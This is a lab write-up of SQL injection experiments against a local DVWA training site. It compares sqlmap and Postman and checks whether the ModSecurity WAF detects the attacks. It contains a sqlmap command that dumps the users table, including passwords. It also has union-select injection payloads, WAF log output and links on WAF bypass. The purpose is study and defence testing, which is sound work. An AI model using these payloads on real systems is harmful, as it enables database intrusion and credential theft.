# SQL Injections Experiments

Here you can find some examples of sql injections to DVWA site:

[ComputerSecurityStudent](https://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/index.html)

[Bypass WAF](https://securityonline.info/sql-injection-9-ways-bypass-web-application-firewall/)

# Install SQLMAP

[Sqlmap](http://sqlmap.org/) is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection for different database management systems.

Execution: bash commands 

Code: the code is available in the following  [link](https://github.com/sqlmapproject/sqlmap) 

Install:  inside a docker container execute:

```bash
apt-get -y update
apt-get install -y sqlmap
```

## Experiment 1: Send SQL injections with Sqlmap to the vulnerable site DWVA

Here is an example of a SQL injection: does the dump for the table users downloading information such username and password. In this test to extract manually the cookie was used Tamper Data in Firefox. 

```bash

sqlmap -u "[http://localhost/vulnerabilities/sqli/?id=11&Submit=Submit](http://localhost/vulnerabilities/sqli/?id=11&Submit=Submit)" --cookie="PHPSESSID=32bqv5j1e7s3f2ucte5969bhq3; security=low" --dbs --tables -D dvwa -T users --columns -C "user, avatar, failed_login, first_name, last_login, last_name, password, user_id" --dump 
```

## Experiment 2: WAF integration - sqlmap + WAF

Filtering by basic SQL injections in the configuration of ModSecurity. The problem here is that the log files will be different if different rules are configured.  Here is provided an example of log file */var/log/apache/** for the basic configuration recommended in /[etc/modsecurity/modsecurity.conf-recommended](https://help.dreamhost.com/hc/en-us/articles/223614947-Installing-ModSecurity-with-Apache-on-Ubuntu-14-04): 

```bash
Message: Warning. Matched phrase "sqlmap" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "59"] [id "913100"] [rev "2"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: sqlmap found within REQUEST_HEADERS:User-Agent: sqlmap/1.1#stable (http://sqlmap.org)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]
Message: Warning. Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "57"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"]
Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "73"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Found User-Agent associated with security scanner"] [tag "event-correlation"]
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: application/x-httpd-php
Stopwatch: 1598238108767590 6303 (- - -)
Stopwatch2: 1598238108767590 6303; combined=2208, p1=443, p2=1186, p3=40, p4=229, p5=239, sr=97, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); OWASP_CRS/3.0.0.
Server: Apache/2.4.25 (Debian)
Engine-Mode: "DETECTION_ONLY"
```

In this case as the engine mode is 'DETECTION_ONLY' the sql inject still works. In order to activate the security mode, you would need to change in the file */etc/modsecurity/modsecurity.conf* the following line SecRule DetectionOnly for SecRule On.

## **Experiment 3:** **Invocation directly from DVWA**

When modsecurity is enabled with the basic configuration, send the invocation of the following SQL Injection filling the blank in the url [http://localhost/vulnerabilities/sqli/](http://localhost/vulnerabilities/sqli/):

```bash
%' or 0=0 union select null, version() #
```

The DVWA site gives the following error:

![images/Screen_Shot_2020-09-03_at_3.50.50_PM.png](images/Screen_Shot_2020-09-03_at_3.50.50_PM.png)

The log shows the following:

```bash
Message: Warning. detected SQLi using libinjection with fingerprint 's&1UE' [file "/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "68"] [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s&1UE found within ARGS:id: %' or 0=0 union select null, version() #"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
Message: Warning. Pattern match "(?i:(?:[\"'`](?:;?\\s*?(?:having|select|union)\\b\\s*?[^\\s]|\\s*?!\\s*?[\"'`\\w])|(?:c(?:onnection_id|urrent_user)|database)\\s*?\\([^\\)]*?|u(?:nion(?:[\\w(\\s]*?select| select @)|ser\\s*?\\([^\\)]*?)|s(?:chema\\s*?\\([^\\)]*?|elect.*?\\w?user\\()|in ..." at ARGS:id. [file "/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "195"] [id "942190"] [msg "Detects MSSQL code execution and information gathering attempts"] [data "Matched Data: union select found within ARGS:id: %' or 0=0 union select null, version() #"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
Message: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "93"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"]
Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "91"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [ver "OWASP_CRS/3.2.0"] [tag "event-correlation"]
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1599158975445300 10510 (- - -)
Stopwatch2: 1599158975445300 10510; combined=6762, p1=2961, p2=3066, p3=0, p4=0, p5=725, sr=402, sw=10, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); OWASP_CRS/3.2.0.
Server: Apache/2.4.25 (Debian)
Engine-Mode: "ENABLED"
```

It means that the SQL injection is detected by the WAF and as modesecurity is enabled it rejects the access. The same log appears in the case when modsecurity is in DetectOnly mode, but at the end appears Engine-Mode: "DetectOnly" and the WAF let the request to be processed.

## Experiment 4: Send SQL injection through postman

Send GET HTTP with content extracted from Temper Data. Here is the log produced without modeSecurity.

```bash
==> /var/log/apache2/access.log <==
172.17.0.1 - - [27/Aug/2020:23:25:57 +0000] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1793 "http://localhost/vulnerabilities/sqli/" "PostmanRuntime/7.26.3"
```

As we can see there is not any error in the apache log file. This might not happen in real life since all applications might have at least the modeSecurity basic configuration. Therefore, the following experiment consists on executing the same but with modeSecurity on.

## Experiment 5: Send SQL injection through postman + WAF with modeSecurity

Send the same GET HTTP with the content extracted from Temper Data to the DVWA application, but this time with modeSecurity on. Here is the log produced without any modeSecurity. The output is still the same:

```bash
172.17.0.1 - - [03/Sep/2020:19:13:57 +0000] "GET /vulnerabilities/sqli/?id=%25%27+and+1%3D0+union+select+null%2C+concat%28first_name%2C0x0a%2Clast_name%2C0x0a%2Cuser%2C0x0a%2Cpassword%29+from+users+%23&Submit=Submit HTTP/1.1" 200 2044 "http://localhost/vulnerabilities/sqli/" "PostmanRuntime/7.26.3"
```

The response at postman is as follows:

![images/Screen_Shot_2020-08-27_at_8.54.34_PM.png](images/Screen_Shot_2020-08-27_at_8.54.34_PM.png)

- The same experiment with modsecurity enabled is detected by the WAF. 
The tests done manually from the website and from postman generate the same error logs.     

Here is provided the collections used for this experiments, which you can import it from postman, the docker with the DVWA site is listening in port 80: 

[SQL injections.postman_collection.json](images/SQL_injections.postman_collection.json)

## Sql Injection Types

- Unsanitized Input: the input is not sanitized for characters that should be escaped
- Blind SQL Injection: it doesn’t reveal data directly from the database, but examines  indirect clues in behavior.
- Out-of-Band Injection: An attacker will craft SQL statements that will trigger the database system to create a connection to an external server the attacker controls. In this fashion, the attacker can harvest data or potentially control behavior of the database.
- A Second Order Injection is a type of Out-of-Band Injection attack. In this case, the attacker will provide an SQL injection that will get stored and executed by a separate behavior of the database system.
- [Sqlmap is able to exploit 5 different techniques](https://github.com/sqlmapproject/sqlmap/wiki/Techniques)
    - B: Boolean-based blind
    - E: Error-based
    - U: Union query-based
    - S: Stacked queries
    - T: Time-based blind
    - Q: Inline queries

## Examples

- [SQL Injection with sqlmap: a tutorial](https://whisperlab.org/introduction-to-hacking/talks/sqlmap)
- [By Pass WAF](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF)

# Conclusion

In theory, postman might be a suitable tool for simulating SQL injections against DVWA site through HTTP since the error logs generated are the same for postman and for the site. The issue is that those injections have to be manually programmed. On the other hand, Sqlmap is a tool that automatically generate different types of sql injections. 
